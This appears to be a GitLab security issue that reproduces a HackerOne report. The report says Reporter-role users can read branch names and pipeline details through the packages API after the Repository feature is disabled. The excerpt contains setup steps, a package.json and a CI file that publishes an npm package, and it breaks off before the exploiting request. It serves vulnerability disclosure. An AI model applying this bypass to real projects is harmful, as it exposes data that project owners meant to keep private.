Reporter can read branch names and pipeline details even when the Repository option is disabled in the project via GET /api/v4/projects/{id}/packages

⚠️ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #3183740 by iamgk808 on 2025-06-09, assigned to @katwu:

Report | Attachments | How To Reproduce

Report

Summary

Once the Repository option is disabled in a project, no one can view the project code, branches, merge requests, or CI/CD details. However, I found a way where an attacker can still read branch names and pipeline details even when the Repository option is disabled

Steps to reproduce

two users - victim, attacker

Victim steps:

Create a new group called hackerone & apply GitLab Ultimate trial to it
In the group, create a private project called project-1
In project-1, create a new branch called fix-bug-report
In the fix-bug-report branch, create a file called package.json and add the following content, ==also replace 70651278 with your project ID==

{
  "name": "my-package",  
  "version": "1.0.0",  
  "publishConfig": {  
    "registry": "https://gitlab.com/api/v4/projects/70651278/packages/npm/"  
  }  
}

Create another file called .gitlab-ci.yml

image: node:20

stages:  
  - publish

variables:  
  NODE_AUTH_TOKEN: "${CI_JOB_TOKEN}"

before_script:  
  - npm install

publish:  
  stage: publish  
  script:  
    - echo "//gitlab.com/api/v4/projects/${CI_PROJECT_ID}/packages/npm/:_authToken=${NODE_AUTH_TOKEN}" > .npmrc  
    - npm publish

A pipeline will run & create a package in deploy > Package registry& you can see the branch name & commit details
Then go to settings > project permissions & turn off the Repository option & save it
In deploy > Package registry, as you can see, the branch name & commit details are hidden
Now go to the project-1 >members section & invite the attacker user with the reporter role